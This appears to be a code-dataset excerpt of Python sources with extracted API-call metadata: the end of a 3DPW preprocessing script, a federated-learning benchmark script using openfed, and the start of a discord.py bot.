                        pose[:3] = cv2.Rodrigues(np.dot(cam_R, cv2.Rodrigues(pose[:3])[0]))[0].T[0]

                        # Accumulate annotations for this frame/person.
                        cropped_frame_fnames_.append(cropped_image_fname)
                        centers_.append(center)
                        whs_.append(wh)
                        poses_.append(pose)
                        shapes_.append(shape)
                        genders_.append(gender)

    # Store all data in one npz file.
    out_file = os.path.join(out_path, '3dpw_test.npz')
    np.savez(out_file, imgname=cropped_frame_fnames_,
             center=centers_,
             wh=whs_,
             pose=poses_,
             shape=shapes_,
             gender=genders_)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--dataset_path', type=str)
    args = parser.parse_args()

    os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"  # see issue #152
    os.environ["CUDA_VISIBLE_DEVICES"] = "0"
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    print('\nDevice: {}'.format(device))

    out_path = os.path.join(args.dataset_path, 'test')
    # The original only created the output tree when `out_path` was missing
    # entirely; if `out_path` existed without 'cropped_frames', the later
    # cv2.imwrite calls would fail. makedirs(..., exist_ok=True) creates the
    # full path unconditionally and is a no-op when it already exists.
    os.makedirs(os.path.join(out_path, 'cropped_frames'), exist_ok=True)

    pw3d_eval_extract(args.dataset_path, out_path)
| [
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"numpy.sin",
"numpy.savez",
"argparse.ArgumentParser",
"os.path.isdir",
"pickle.load",
"os.path.isfile",
"numpy.cos",
"cv2.imread",
"cv2.imwrite",
"utils.cam_utils.perspective_project_torch",
"os.path.join",
"numpy.sum",
"nu... | [((377, 413), 'numpy.array', 'np.array', (['[xx, yy]'], {'dtype': 'np.float32'}), '([xx, yy], dtype=np.float32)\n', (385, 413), True, 'import numpy as np\n'), ((632, 643), 'numpy.zeros', 'np.zeros', (['(2)'], {}), '(2)\n', (640, 643), True, 'import numpy as np\n'), ((1018, 1072), 'numpy.array', 'np.array', (['[dst_w * 0.5, dst_h * 0.5]'], {'dtype': 'np.float32'}), '([dst_w * 0.5, dst_h * 0.5], dtype=np.float32)\n', (1026, 1072), True, 'import numpy as np\n'), ((1091, 1135), 'numpy.array', 'np.array', (['[0, dst_h * 0.5]'], {'dtype': 'np.float32'}), '([0, dst_h * 0.5], dtype=np.float32)\n', (1099, 1135), True, 'import numpy as np\n'), ((1155, 1199), 'numpy.array', 'np.array', (['[dst_w * 0.5, 0]'], {'dtype': 'np.float32'}), '([dst_w * 0.5, 0], dtype=np.float32)\n', (1163, 1199), True, 'import numpy as np\n'), ((1211, 1245), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'np.float32'}), '((3, 2), dtype=np.float32)\n', (1219, 1245), True, 'import numpy as np\n'), ((1367, 1401), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'np.float32'}), '((3, 2), dtype=np.float32)\n', (1375, 1401), True, 'import numpy as np\n'), ((9858, 9897), 'os.path.join', 'os.path.join', (['out_path', '"""3dpw_test.npz"""'], {}), "(out_path, '3dpw_test.npz')\n", (9870, 9897), False, 'import os\n'), ((9902, 10026), 'numpy.savez', 'np.savez', (['out_file'], {'imgname': 'cropped_frame_fnames_', 'center': 'centers_', 'wh': 'whs_', 'pose': 'poses_', 'shape': 'shapes_', 'gender': 'genders_'}), '(out_file, imgname=cropped_frame_fnames_, center=centers_, wh=whs_,\n pose=poses_, shape=shapes_, gender=genders_)\n', (9910, 10026), True, 'import numpy as np\n'), ((10130, 10155), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (10153, 10155), False, 'import argparse\n'), ((10487, 10526), 'os.path.join', 'os.path.join', (['args.dataset_path', '"""test"""'], {}), "(args.dataset_path, 'test')\n", (10499, 10526), False, 'import os\n'), ((283, 298), 'numpy.sin', 'np.sin', 
(['rot_rad'], {}), '(rot_rad)\n', (289, 298), True, 'import numpy as np\n'), ((300, 315), 'numpy.cos', 'np.cos', (['rot_rad'], {}), '(rot_rad)\n', (306, 315), True, 'import numpy as np\n'), ((816, 860), 'numpy.array', 'np.array', (['[0, src_h * 0.5]'], {'dtype': 'np.float32'}), '([0, src_h * 0.5], dtype=np.float32)\n', (824, 860), True, 'import numpy as np\n'), ((900, 944), 'numpy.array', 'np.array', (['[src_w * 0.5, 0]'], {'dtype': 'np.float32'}), '([src_w * 0.5, 0], dtype=np.float32)\n', (908, 944), True, 'import numpy as np\n'), ((2427, 2448), 'os.path.isfile', 'os.path.isfile', (['image'], {}), '(image)\n', (2441, 2448), False, 'import os\n'), ((10538, 10561), 'os.path.isdir', 'os.path.isdir', (['out_path'], {}), '(out_path)\n', (10551, 10561), False, 'import os\n'), ((1564, 1579), 'numpy.float32', 'np.float32', (['dst'], {}), '(dst)\n', (1574, 1579), True, 'import numpy as np\n'), ((1581, 1596), 'numpy.float32', 'np.float32', (['src'], {}), '(src)\n', (1591, 1596), True, 'import numpy as np\n'), ((1647, 1662), 'numpy.float32', 'np.float32', (['src'], {}), '(src)\n', (1657, 1662), True, 'import numpy as np\n'), ((1664, 1679), 'numpy.float32', 'np.float32', (['dst'], {}), '(dst)\n', (1674, 1679), True, 'import numpy as np\n'), ((3152, 3197), 'models.smpl_official.SMPL', 'SMPL', (['paths.SMPL'], {'batch_size': '(1)', 'gender': '"""male"""'}), "(paths.SMPL, batch_size=1, gender='male')\n", (3156, 3197), False, 'from models.smpl_official import SMPL\n'), ((3227, 3274), 'models.smpl_official.SMPL', 'SMPL', (['paths.SMPL'], {'batch_size': '(1)', 'gender': '"""female"""'}), "(paths.SMPL, batch_size=1, gender='female')\n", (3231, 3274), False, 'from models.smpl_official import SMPL\n'), ((3476, 3530), 'os.path.join', 'os.path.join', (['dataset_path', '"""sequenceFiles"""', '"""test"""', 'f'], {}), "(dataset_path, 'sequenceFiles', 'test', f)\n", (3488, 3530), False, 'import os\n'), ((3816, 3849), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""latin1"""'}), "(f, 
encoding='latin1')\n", (3827, 3849), False, 'import pickle\n'), ((5231, 5247), 'numpy.sum', 'np.sum', (['valid[0]'], {}), '(valid[0])\n', (5237, 5247), True, 'import numpy as np\n'), ((5249, 5266), 'numpy.sum', 'np.sum', (['valid[-1]'], {}), '(valid[-1])\n', (5255, 5266), True, 'import numpy as np\n'), ((10392, 10417), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (10415, 10417), False, 'import torch\n'), ((10583, 10623), 'os.path.join', 'os.path.join', (['out_path', '"""cropped_frames"""'], {}), "(out_path, 'cropped_frames')\n", (10595, 10623), False, 'import os\n'), ((2483, 2500), 'cv2.imread', 'cv2.imread', (['image'], {}), '(image)\n', (2493, 2500), False, 'import cv2\n'), ((3580, 3631), 'os.path.join', 'os.path.join', (['dataset_path', '"""sequenceFiles"""', '"""test"""'], {}), "(dataset_path, 'sequenceFiles', 'test')\n", (3592, 3631), False, 'import os\n'), ((7327, 7389), 'utils.cam_utils.perspective_project_torch', 'perspective_project_torch', (['vertices', 'cam_R', 'cam_t'], {'cam_K': 'cam_K'}), '(vertices, cam_R, cam_t, cam_K=cam_K)\n', (7352, 7389), False, 'from utils.cam_utils import perspective_project_torch\n'), ((8324, 8347), 'cv2.imread', 'cv2.imread', (['image_fpath'], {}), '(image_fpath)\n', (8334, 8347), False, 'import cv2\n'), ((8909, 8970), 'os.path.join', 'os.path.join', (['out_path', '"""cropped_frames"""', 'cropped_image_fname'], {}), "(out_path, 'cropped_frames', cropped_image_fname)\n", (8921, 8970), False, 'import os\n'), ((9046, 9093), 'cv2.imwrite', 'cv2.imwrite', (['cropped_image_fpath', 'cropped_image'], {}), '(cropped_image_fpath, cropped_image)\n', (9057, 9093), False, 'import cv2\n'), ((5430, 5462), 'torch.from_numpy', 'torch.from_numpy', (['cam_K[None, :]'], {}), '(cam_K[None, :])\n', (5446, 5462), False, 'import torch\n'), ((5717, 5749), 'torch.from_numpy', 'torch.from_numpy', (['shape[None, :]'], {}), '(shape[None, :])\n', (5733, 5749), False, 'import torch\n'), ((6299, 6330), 'torch.from_numpy', 
'torch.from_numpy', (['pose[None, :]'], {}), '(pose[None, :])\n', (6315, 6330), False, 'import torch\n'), ((6378, 6410), 'torch.from_numpy', 'torch.from_numpy', (['cam_t[None, :]'], {}), '(cam_t[None, :])\n', (6394, 6410), False, 'import torch\n'), ((6458, 6493), 'torch.from_numpy', 'torch.from_numpy', (['cam_R[None, :, :]'], {}), '(cam_R[None, :, :])\n', (6474, 6493), False, 'import torch\n'), ((6547, 6585), 'torch.from_numpy', 'torch.from_numpy', (['frame_trans[None, :]'], {}), '(frame_trans[None, :])\n', (6563, 6585), False, 'import torch\n'), ((9352, 9375), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose[:3]'], {}), '(pose[:3])\n', (9365, 9375), False, 'import cv2\n')] |
# @Author : FederalLab
# @Date : 2021-09-26 11:03:42
# @Last Modified by : <NAME>
# @Last Modified time: 2021-09-26 11:03:42
# Copyright (c) FederalLab. All rights reserved.
import argparse
import json
import os
import time
import openfed
import torch
from torch.utils.data import DataLoader
from benchmark.datasets import build_dataset
from benchmark.models import build_model
from benchmark.tasks import Tester, Trainer
from benchmark.utils import StoreDict, meta_reduce_log
# Command-line interface for the federated benchmark script. Argument groups:
# task/model, dataset/partitioning, federated training, logging, and the
# federated-properties file that describes this process's role and address.
parser = argparse.ArgumentParser('benchmark-lightly')
# task
parser.add_argument('--task',
                    type=str,
                    default='mnist',
                    choices=[
                        'celeba', 'cifar100', 'femnist', 'mnist', 'reddit',
                        'sent140', 'shakespeare', 'stackoverflow', 'synthetic'
                    ])
parser.add_argument('--network_args',
                    nargs='+',
                    action=StoreDict,
                    default=dict(),
                    help='extra network args passed in.')
# dataset
parser.add_argument('--data_root',
                    type=str,
                    default='benchmark/datasets/mnist/data',
                    help='The folder contains all datasets.')
parser.add_argument('--partition',
                    type=str,
                    default='iid',
                    choices=['iid', 'dirichlet', 'power-law'],
                    help='How to split the dataset into different parts.'
                    'Only be used with not federated dataset, such as mnist.')
parser.add_argument('--partition_args',
                    nargs='+',
                    action=StoreDict,
                    default=dict(),
                    help='extra partition args passed in.')
parser.add_argument('--num_parts',
                    type=int,
                    default=100,
                    help='The number of the parts to split into.')
parser.add_argument('--tst_num_parts',
                    type=int,
                    default=-1,
                    help='The number of the parts to split into.')
parser.add_argument('--dataset_args',
                    nargs='+',
                    action=StoreDict,
                    default=dict(),
                    help='extra dataset args passed in.')
# train
parser.add_argument('--epochs',
                    type=int,
                    default=1,
                    help='The epochs trained on local client.')
parser.add_argument('--rounds',
                    type=int,
                    default=10,
                    help='The total rounds for federated training.')
parser.add_argument('--act_clts',
                    '--activated_clients',
                    type=int,
                    default=10,
                    help='The number of parts used to train at each round.')
parser.add_argument(
    '--act_clts_rat',
    '--activated_clients_ratio',
    type=float,
    default=1.0,
    help='The portion of parts used to train at each time, in [0, 1].')
parser.add_argument('--tst_act_clts',
                    '--test_activated_clients',
                    type=int,
                    default=10,
                    help='The number of parts used to test at each round.'
                    'If not specified, use full test dataset.')
parser.add_argument(
    '--tst_act_clts_rat',
    '--test_activated_clients_ratio',
    type=float,
    default=1.0,
    help='The portion of parts used to train at each time, in [0, 1].')
parser.add_argument(
    '--max_acg_step',
    type=int,
    default=-1,
    help='The number of samples used to compute acg. -1 used all train data.')
parser.add_argument(
    '--optim',
    type=str,
    default='fedavg',
    choices=['fedavg', 'fedsgd', 'fedela', 'fedprox', 'scaffold'],
    help='Specify fed optimizer.')
parser.add_argument('--optim_args',
                    nargs='+',
                    action=StoreDict,
                    default=dict(),
                    help='extra optim args passed in.')
parser.add_argument('--co_lr',
                    '--collaborator_lr',
                    type=float,
                    default=1e-2,
                    help='The learning rate of collaborator optimizer.')
parser.add_argument('--ag_lr',
                    '--aggregator_lr',
                    type=float,
                    default=1.0,
                    help='The learning rate of aggregator optimizer.')
parser.add_argument('--bz',
                    '--batch_size',
                    type=int,
                    default=10,
                    help='The batch size.')
parser.add_argument('--gpu',
                    action='store_true',
                    default=False,
                    help='Whether to use gpu.')
# log
parser.add_argument('--log_dir',
                    type=str,
                    default='logs/',
                    help='The dir to log train and test information.')
parser.add_argument('--seed', type=int, default=0, help='Seed for everything.')
# props
parser.add_argument('--props', type=str, default='/tmp/aggregator.json')

args = parser.parse_args()
# Experiment name encodes optimizer and (for mnist only) the partition scheme.
args.exp_name = args.optim + '_' + (args.partition
                                    if args.task == 'mnist' else '')

print('>>> Load Props')
# The props file must describe exactly one federated endpoint (this process).
props = openfed.federated.FederatedProperties.load(args.props)
assert len(props) == 1
props = props[0]

print(props)

# Default the number of test parts to the number of collaborators
# (world_size minus the aggregator) when not given on the command line.
args.tst_num_parts = args.tst_num_parts if args.tst_num_parts > 0 \
    else props.address.world_size - 1

print('>>> Seed everything...')
openfed.utils.seed_everything(args.seed)

print('>>> Log argparse to json...')
args.log_dir = os.path.join(args.log_dir, args.task, args.exp_name)
os.makedirs(args.log_dir, exist_ok=True)
# Only the aggregator records the run configuration.
if props.aggregator:
    with open(os.path.join(args.log_dir, 'config.json'), 'w') as f:
        json.dump(args.__dict__, f)

print('>>> Config device...')
if args.gpu and torch.cuda.is_available():
    # NOTE(review): `fed_rank` is not declared by this script's argparse
    # parser — confirm it is injected elsewhere (e.g. by a launcher); as
    # written this line raises AttributeError when --gpu is set.
    args.gpu = args.fed_rank % torch.cuda.device_count()
    args.device = torch.device(args.gpu)
    torch.cuda.set_device(args.gpu)
else:
    args.device = torch.device('cpu')
print(args.__dict__)
print(f"\tLet's use {args.device}.")
print('>>> Load dataset...')
# mnist is a plain (non-federated) dataset, so it must be partitioned into
# client shards; the other tasks either carry their own federated split
# (reddit: mode=train/test) or use a simple train/test flag.
if args.task == 'mnist':
    if args.partition == 'iid':
        partitioner = openfed.data.IIDPartitioner()
    elif args.partition == 'dirichlet':
        partitioner = openfed.data.DirichletPartitioner(**args.partition_args)
    elif args.partition == 'power-law':
        partitioner = openfed.data.PowerLawPartitioner(**args.partition_args)
    else:
        raise NotImplementedError
    train_args = dict(total_parts=args.num_parts, partitioner=partitioner)
    test_args = dict(
        total_parts=args.tst_num_parts,
        partitioner=partitioner,
    )
elif args.task == 'reddit':
    train_args = dict(mode='train')
    test_args = dict(mode='test')
else:
    train_args = dict(train=True)
    test_args = dict(train=False)

train_dataset = build_dataset(args.task,
                              root=args.data_root,
                              **train_args,
                              **args.dataset_args)
test_dataset = build_dataset(args.task,
                             root=args.data_root,
                             **test_args,
                             **args.dataset_args)
print(train_dataset)
print(test_dataset)

print('>>> Load dataLoader...')
train_dataloader = DataLoader(train_dataset,
                              batch_size=args.bz,
                              shuffle=True,
                              num_workers=0,
                              drop_last=False)
test_dataloader = DataLoader(test_dataset,
                             batch_size=args.bz,
                             shuffle=False,
                             num_workers=0,
                             drop_last=False)

print('>>> Build network...')
network = build_model(args.task, **args.network_args)
print(network)

print('>>> Move to device...')
network = network.to(args.device)
print('>>> Federated Optimizer...')
# Every federated strategy wraps the same plain SGD base optimizer; the
# learning rate depends on whether this process is the aggregator or a
# collaborator. The strategy then picks the wrapper class, the aggregation
# function, and any aggregation kwargs.
_base_lr = args.ag_lr if props.aggregator else args.co_lr
optim = torch.optim.SGD(network.parameters(), lr=_base_lr)
if args.optim == 'fedavg':
    fed_optim = openfed.optim.FederatedOptimizer(optim, role=props.role)
    aggregator = openfed.functional.naive_aggregation
    aggregator_kwargs = {}
elif args.optim == 'fedela':
    fed_optim = openfed.optim.ElasticOptimizer(optim, role=props.role)
    aggregator = openfed.functional.elastic_aggregation
    aggregator_kwargs = {'quantile': 0.5}
elif args.optim == 'fedsgd':
    fed_optim = openfed.optim.FederatedOptimizer(optim, role=props.role)
    aggregator = openfed.functional.average_aggregation
    aggregator_kwargs = {}
elif args.optim == 'fedprox':
    fed_optim = openfed.optim.ProxOptimizer(optim, role=props.role)
    aggregator = openfed.functional.naive_aggregation
    aggregator_kwargs = {}
elif args.optim == 'scaffold':
    fed_optim = openfed.optim.ScaffoldOptimizer(optim, role=props.role)
    aggregator = openfed.functional.naive_aggregation
    aggregator_kwargs = {}
else:
    raise NotImplementedError(f'{args.optim} is not implemented.')

print('>>> Lr Scheduler...')
# Cosine-anneal the base learning rate over the full span of federated rounds.
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optim, T_max=args.rounds)
print('>>> Maintainer...')
# The maintainer synchronises the model state dict across the federation;
# keep_vars=True keeps parameter tensors (not detached copies) in the dict.
maintainer = openfed.core.Maintainer(props, network.state_dict(keep_vars=True))

print('>>> Register hooks...')
# Resolve how many client parts participate per round: an explicit count
# takes precedence, otherwise a ratio of all parts is used.
parts_list = list(range(train_dataset.total_parts))
act_clts = args.act_clts if args.act_clts > 0 else\
    int(len(parts_list) * args.act_clts_rat)
assert act_clts <= len(parts_list)
tst_parts_list = list(range(test_dataset.total_parts))
tst_act_clts = args.tst_act_clts if args.tst_act_clts > 0 else\
    int(len(tst_parts_list) * args.tst_act_clts_rat)
assert tst_act_clts <= len(tst_parts_list)
print(f'\tTrain Part: {len(parts_list)}')
print(f'\tActivated Train Part: {act_clts}')
print(f'\tTest Part: {len(tst_parts_list)}')
print(f'\tActivated Test Part: {tst_act_clts}')
# Install the dispatch hook that hands out train/test parts each round.
with maintainer:
    openfed.functional.device_alignment()
    openfed.functional.dispatch_step(counts=[act_clts, tst_act_clts],
                                     parts_list=dict(
                                         train=parts_list,
                                         test=tst_parts_list,
                                     ))
def step():
    """Run the collaborator loop.

    Repeatedly pulls a task from the maintainer and executes a local
    training or testing epoch, reporting metrics back, until the
    maintainer goes offline.
    """
    # build a trainer and tester
    trainer = Trainer(maintainer,
                      network,
                      fed_optim,
                      train_dataloader,
                      cache_folder=f'/tmp/{args.task}/{args.exp_name}')
    tester = Tester(maintainer, network, test_dataloader)
    task_info = openfed.Meta()
    while True:
        # Poll the maintainer until a task is available; sleep between
        # attempts to avoid busy-waiting.
        while not maintainer.step(upload=False, meta=task_info):
            time.sleep(1.0)
            if maintainer.is_offline:
                break
        if maintainer.is_offline:
            break
        if task_info.mode == 'train':  # type: ignore
            trainer.start_training(task_info)
            # Keep the lr schedule in sync with the global round number.
            lr_scheduler.last_epoch = task_info.version  # type: ignore
            lr_scheduler.step()
            duration_acg = trainer.acg_epoch(max_acg_step=args.max_acg_step)
            acc, loss, duration = trainer.train_epoch(epoch=args.epochs)
            # Metrics reported back to the aggregator with this task.
            train_info = dict(
                accuracy=acc,
                loss=loss,
                duration=duration,
                duration_acg=duration_acg,
                version=task_info.version,  # type: ignore
                instances=len(trainer.dataloader.dataset),  # type: ignore
            )
            task_info.update(train_info)
            trainer.finish_training(task_info)
        else:
            tester.start_testing(task_info)
            acc, loss, duration = tester.test_epoch()
            test_info = dict(
                accuracy=acc,
                loss=loss,
                duration=duration,
                version=task_info.version,  # type: ignore
                instances=len(tester.dataloader.dataset),  # type: ignore
            )
            task_info.update(test_info)
            tester.finish_testing(task_info)
# Aggregator process: truncate the previous result log, then drive the
# full federated run (aggregation + metric reduction) for args.rounds
# rounds.  Collaborator processes instead enter the `step` loop.
if maintainer.aggregator:
    result_path = os.path.join(args.log_dir, f'{args.task}.json')
    with open(result_path, 'w') as f:
        # clear last result
        f.write('')
    openfed_api = openfed.API(maintainer,
                              fed_optim,
                              rounds=args.rounds,
                              agg_func=aggregator,
                              agg_func_kwargs=aggregator_kwargs,
                              reduce_func=meta_reduce_log,
                              reduce_func_kwargs=dict(log_dir=result_path),
                              with_test_round=True)
    openfed_api.start()
    openfed_api.join()
    maintainer.killed()
else:
    step()
| [
"torch.cuda.device_count",
"time.sleep",
"torch.cuda.is_available",
"openfed.Meta",
"openfed.utils.seed_everything",
"argparse.ArgumentParser",
"openfed.data.DirichletPartitioner",
"openfed.optim.ScaffoldOptimizer",
"openfed.optim.FederatedOptimizer",
"openfed.federated.FederatedProperties.load",
... | [((514, 558), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""benchmark-lightly"""'], {}), "('benchmark-lightly')\n", (537, 558), False, 'import argparse\n'), ((5314, 5368), 'openfed.federated.FederatedProperties.load', 'openfed.federated.FederatedProperties.load', (['args.props'], {}), '(args.props)\n', (5356, 5368), False, 'import openfed\n'), ((5562, 5602), 'openfed.utils.seed_everything', 'openfed.utils.seed_everything', (['args.seed'], {}), '(args.seed)\n', (5591, 5602), False, 'import openfed\n'), ((5656, 5708), 'os.path.join', 'os.path.join', (['args.log_dir', 'args.task', 'args.exp_name'], {}), '(args.log_dir, args.task, args.exp_name)\n', (5668, 5708), False, 'import os\n'), ((5710, 5750), 'os.makedirs', 'os.makedirs', (['args.log_dir'], {'exist_ok': '(True)'}), '(args.log_dir, exist_ok=True)\n', (5721, 5750), False, 'import os\n'), ((6974, 7059), 'benchmark.datasets.build_dataset', 'build_dataset', (['args.task'], {'root': 'args.data_root'}), '(args.task, root=args.data_root, **train_args, **args.dataset_args\n )\n', (6987, 7059), False, 'from benchmark.datasets import build_dataset\n'), ((7160, 7239), 'benchmark.datasets.build_dataset', 'build_dataset', (['args.task'], {'root': 'args.data_root'}), '(args.task, root=args.data_root, **test_args, **args.dataset_args)\n', (7173, 7239), False, 'from benchmark.datasets import build_dataset\n'), ((7421, 7516), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.bz', 'shuffle': '(True)', 'num_workers': '(0)', 'drop_last': '(False)'}), '(train_dataset, batch_size=args.bz, shuffle=True, num_workers=0,\n drop_last=False)\n', (7431, 7516), False, 'from torch.utils.data import DataLoader\n'), ((7651, 7746), 'torch.utils.data.DataLoader', 'DataLoader', (['test_dataset'], {'batch_size': 'args.bz', 'shuffle': '(False)', 'num_workers': '(0)', 'drop_last': '(False)'}), '(test_dataset, batch_size=args.bz, shuffle=False, num_workers=0,\n drop_last=False)\n', (7661, 7746), 
False, 'from torch.utils.data import DataLoader\n'), ((7900, 7943), 'benchmark.models.build_model', 'build_model', (['args.task'], {}), '(args.task, **args.network_args)\n', (7911, 7943), False, 'from benchmark.models import build_model\n'), ((9758, 9826), 'torch.optim.lr_scheduler.CosineAnnealingLR', 'torch.optim.lr_scheduler.CosineAnnealingLR', (['optim'], {'T_max': 'args.rounds'}), '(optim, T_max=args.rounds)\n', (9800, 9826), False, 'import torch\n'), ((5923, 5948), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5946, 5948), False, 'import torch\n'), ((6025, 6047), 'torch.device', 'torch.device', (['args.gpu'], {}), '(args.gpu)\n', (6037, 6047), False, 'import torch\n'), ((6052, 6083), 'torch.cuda.set_device', 'torch.cuda.set_device', (['args.gpu'], {}), '(args.gpu)\n', (6073, 6083), False, 'import torch\n'), ((6108, 6127), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (6120, 6127), False, 'import torch\n'), ((8234, 8290), 'openfed.optim.FederatedOptimizer', 'openfed.optim.FederatedOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8266, 8290), False, 'import openfed\n'), ((10569, 10606), 'openfed.functional.device_alignment', 'openfed.functional.device_alignment', ([], {}), '()\n', (10604, 10606), False, 'import openfed\n'), ((10953, 11065), 'benchmark.tasks.Trainer', 'Trainer', (['maintainer', 'network', 'fed_optim', 'train_dataloader'], {'cache_folder': 'f"""/tmp/{args.task}/{args.exp_name}"""'}), "(maintainer, network, fed_optim, train_dataloader, cache_folder=\n f'/tmp/{args.task}/{args.exp_name}')\n", (10960, 11065), False, 'from benchmark.tasks import Tester, Trainer\n'), ((11162, 11206), 'benchmark.tasks.Tester', 'Tester', (['maintainer', 'network', 'test_dataloader'], {}), '(maintainer, network, test_dataloader)\n', (11168, 11206), False, 'from benchmark.tasks import Tester, Trainer\n'), ((11223, 11237), 'openfed.Meta', 'openfed.Meta', ([], {}), '()\n', (11235, 11237), False, 
'import openfed\n'), ((12735, 12782), 'os.path.join', 'os.path.join', (['args.log_dir', 'f"""{args.task}.json"""'], {}), "(args.log_dir, f'{args.task}.json')\n", (12747, 12782), False, 'import os\n'), ((5848, 5875), 'json.dump', 'json.dump', (['args.__dict__', 'f'], {}), '(args.__dict__, f)\n', (5857, 5875), False, 'import json\n'), ((5981, 6006), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (6004, 6006), False, 'import torch\n'), ((6298, 6327), 'openfed.data.IIDPartitioner', 'openfed.data.IIDPartitioner', ([], {}), '()\n', (6325, 6327), False, 'import openfed\n'), ((8546, 8600), 'openfed.optim.ElasticOptimizer', 'openfed.optim.ElasticOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8576, 8600), False, 'import openfed\n'), ((5786, 5827), 'os.path.join', 'os.path.join', (['args.log_dir', '"""config.json"""'], {}), "(args.log_dir, 'config.json')\n", (5798, 5827), False, 'import os\n'), ((6390, 6446), 'openfed.data.DirichletPartitioner', 'openfed.data.DirichletPartitioner', ([], {}), '(**args.partition_args)\n', (6423, 6446), False, 'import openfed\n'), ((8873, 8929), 'openfed.optim.FederatedOptimizer', 'openfed.optim.FederatedOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8905, 8929), False, 'import openfed\n'), ((11332, 11347), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (11342, 11347), False, 'import time\n'), ((6509, 6564), 'openfed.data.PowerLawPartitioner', 'openfed.data.PowerLawPartitioner', ([], {}), '(**args.partition_args)\n', (6541, 6564), False, 'import openfed\n'), ((9188, 9239), 'openfed.optim.ProxOptimizer', 'openfed.optim.ProxOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (9215, 9239), False, 'import openfed\n'), ((9497, 9552), 'openfed.optim.ScaffoldOptimizer', 'openfed.optim.ScaffoldOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (9528, 9552), False, 'import openfed\n')] |
import os
import asyncio
import logging
from contextlib import suppress
import discord
from discord.ext import commands
import aiohttp
import config
from cogs.utils.database import Database
# Configure the "discord" library logger: warnings and above only,
# appended to discord.log as one JSON object per line.
log = logging.getLogger("discord")
log.setLevel(logging.WARNING)
handler = logging.FileHandler(filename="discord.log", encoding="utf-8", mode="a")
handler.setFormatter(
    logging.Formatter(
        '{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}'
    )
)
log.addHandler(handler)
class Bot(commands.Bot):
    """Discord bot that owns a database handle and a shared HTTP session."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # The aiohttp session is created lazily in login().
        self.client_session = None
        self.DB = Database()

    @classmethod
    def create(cls) -> commands.Bot:
        """Construct a Bot with the project's standard configuration."""
        intents = discord.Intents.all()
        # Drop the event sources the bot never uses.
        for unused in ("dm_typing", "webhooks", "integrations"):
            setattr(intents, unused, False)
        return cls(
            loop=asyncio.get_event_loop(),
            command_prefix=commands.when_mentioned_or("."),
            activity=discord.Game(name="Tax Evasion Simulator"),
            case_insensitive=True,
            allowed_mentions=discord.AllowedMentions(everyone=False),
            intents=intents,
            owner_ids=(225708387558490112,),
        )

    def load_extensions(self) -> None:
        """Load every cog module found in the cogs directory."""
        for entry in os.scandir("cogs"):
            if not entry.is_file():
                continue
            extension = entry.name[:-3]
            try:
                self.load_extension(f"cogs.{extension}")
            except Exception as e:
                print(f"Failed to load extension {extension}.\n{e} \n")

    async def get_json(self, url):
        """Fetch ``url`` and decode the body as JSON.

        Returns None on a timeout or when the response body is not JSON.
        """
        try:
            async with self.client_session.get(url) as response:
                payload = await response.json()
        except (
            asyncio.exceptions.TimeoutError,
            aiohttp.client_exceptions.ContentTypeError,
        ):
            return None
        return payload

    async def close(self) -> None:
        """Unload extensions and cogs, then close Discord and aiohttp."""
        for ext in list(self.extensions):
            try:
                self.unload_extension(ext)
            except Exception:
                pass
        for cog in list(self.cogs):
            try:
                self.remove_cog(cog)
            except Exception:
                pass
        await super().close()
        if self.client_session:
            await self.client_session.close()

    async def login(self, *args, **kwargs) -> None:
        """Create the shared aiohttp session, then log in to Discord."""
        timeout = aiohttp.ClientTimeout(total=6)
        self.client_session = aiohttp.ClientSession(timeout=timeout)
        await super().login(*args, **kwargs)
if __name__ == "__main__":
bot = Bot.create()
bot.load_extensions()
bot.run(config.token)
| [
"logging.getLogger",
"discord.ext.commands.when_mentioned_or",
"discord.AllowedMentions",
"discord.Game",
"logging.Formatter",
"os.scandir",
"cogs.utils.database.Database",
"discord.Intents.all",
"aiohttp.ClientTimeout",
"logging.FileHandler",
"contextlib.suppress",
"asyncio.get_event_loop"
] | [((213, 241), 'logging.getLogger', 'logging.getLogger', (['"""discord"""'], {}), "('discord')\n", (230, 241), False, 'import logging\n'), ((286, 357), 'logging.FileHandler', 'logging.FileHandler', ([], {'filename': '"""discord.log"""', 'encoding': '"""utf-8"""', 'mode': '"""a"""'}), "(filename='discord.log', encoding='utf-8', mode='a')\n", (305, 357), False, 'import logging\n'), ((388, 494), 'logging.Formatter', 'logging.Formatter', (['"""{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}"""'], {}), '(\n \'{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}\'\n )\n', (405, 494), False, 'import logging\n'), ((756, 766), 'cogs.utils.database.Database', 'Database', ([], {}), '()\n', (764, 766), False, 'from cogs.utils.database import Database\n'), ((896, 920), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (918, 920), False, 'import asyncio\n'), ((942, 963), 'discord.Intents.all', 'discord.Intents.all', ([], {}), '()\n', (961, 963), False, 'import discord\n'), ((1146, 1177), 'discord.ext.commands.when_mentioned_or', 'commands.when_mentioned_or', (['"""."""'], 